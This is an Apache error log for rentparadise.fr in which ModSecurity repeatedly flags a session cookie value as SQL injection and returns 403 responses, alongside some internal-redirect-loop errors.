[Tue May 12 03:56:45.879615 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI3bvMumyrWMfSu7q9-gAAANU"]
[Tue May 12 03:56:46.470286 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI3bvMumyrWMfSu7q9-gAAANU"]
[Tue May 12 03:56:46.699351 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/project"] [unique_id "agKI3rOxS7i6i_mT2NLe4wAAAEM"]
[Tue May 12 03:56:46.699571 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/project"] [unique_id "agKI3rOxS7i6i_mT2NLe4wAAAEM"]
[Tue May 12 03:56:46.699774 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI3rOxS7i6i_mT2NLe4wAAAEM"]
[Tue May 12 03:56:46.966293 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI3rvMumyrWMfSu7q9_QAAANU"]
[Tue May 12 03:56:46.966506 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI3rvMumyrWMfSu7q9_QAAANU"]
[Tue May 12 03:56:47.520993 2026] [core:error] [pid 1709071:tid 1709095] [client 74.249.238.26:50242] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:47.521017 2026] [core:error] [pid 1709071:tid 1709095] [client 74.249.238.26:50242] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:47.558629 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI3rvMumyrWMfSu7q9_QAAANU"]
[Tue May 12 03:56:48.521180 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/projects"] [unique_id "agKI4LOxS7i6i_mT2NLe6QAAAEM"]
[Tue May 12 03:56:48.521409 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/projects"] [unique_id "agKI4LOxS7i6i_mT2NLe6QAAAEM"]
[Tue May 12 03:56:48.521619 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI4LOxS7i6i_mT2NLe6QAAAEM"]
[Tue May 12 03:56:49.040695 2026] [core:error] [pid 1695975:tid 1695981] [client 74.249.238.26:40559] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:49.040728 2026] [core:error] [pid 1695975:tid 1695981] [client 74.249.238.26:40559] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:49.741643 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI4bvMumyrWMfSu7q-AgAAANU"]
[Tue May 12 03:56:49.741855 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI4bvMumyrWMfSu7q-AgAAANU"]
[Tue May 12 03:56:50.321061 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI4bvMumyrWMfSu7q-AgAAANU"]
[Tue May 12 03:56:50.489301 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/resources"] [unique_id "agKI4rOxS7i6i_mT2NLe6wAAAEM"]
[Tue May 12 03:56:50.489520 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/resources"] [unique_id "agKI4rOxS7i6i_mT2NLe6wAAAEM"]
[Tue May 12 03:56:50.489726 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI4rOxS7i6i_mT2NLe6wAAAEM"]
[Tue May 12 03:56:51.081028 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI47vMumyrWMfSu7q-BwAAANU"]
[Tue May 12 03:56:51.081225 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI47vMumyrWMfSu7q-BwAAANU"]
[Tue May 12 03:56:51.663224 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI47vMumyrWMfSu7q-BwAAANU"]
[Tue May 12 03:56:52.417837 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/secure"] [unique_id "agKI5LOxS7i6i_mT2NLe7QAAAEM"]
[Tue May 12 03:56:52.418046 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/secure"] [unique_id "agKI5LOxS7i6i_mT2NLe7QAAAEM"]
[Tue May 12 03:56:52.418240 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI5LOxS7i6i_mT2NLe7QAAAEM"]
[Tue May 12 03:56:52.573255 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI5LvMumyrWMfSu7q-CAAAANU"]
[Tue May 12 03:56:52.573452 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI5LvMumyrWMfSu7q-CAAAANU"]
[Tue May 12 03:56:53.167939 2026] [core:error] [pid 1691274:tid 1691288] [client 74.249.238.26:60364] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:53.167971 2026] [core:error] [pid 1691274:tid 1691288] [client 74.249.238.26:60364] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:53.727598 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI5LvMumyrWMfSu7q-CAAAANU"]
[Tue May 12 03:56:54.163336 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/shared"] [unique_id "agKI5rOxS7i6i_mT2NLe8AAAAEM"]
[Tue May 12 03:56:54.163550 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/shared"] [unique_id "agKI5rOxS7i6i_mT2NLe8AAAAEM"]
[Tue May 12 03:56:54.163757 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI5rOxS7i6i_mT2NLe8AAAAEM"]
[Tue May 12 03:56:54.645378 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI5rvMumyrWMfSu7q-CwAAANU"]
[Tue May 12 03:56:54.645565 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI5rvMumyrWMfSu7q-CwAAANU"]
[Tue May 12 03:56:55.230125 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI5rvMumyrWMfSu7q-CwAAANU"]
[Tue May 12 03:56:55.626660 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/upload"] [unique_id "agKI57OxS7i6i_mT2NLe8QAAAEM"]
[Tue May 12 03:56:55.626851 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/upload"] [unique_id "agKI57OxS7i6i_mT2NLe8QAAAEM"]
[Tue May 12 03:56:55.627044 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI57OxS7i6i_mT2NLe8QAAAEM"]
[Tue May 12 03:56:55.852145 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI57vMumyrWMfSu7q-DQAAANU"]
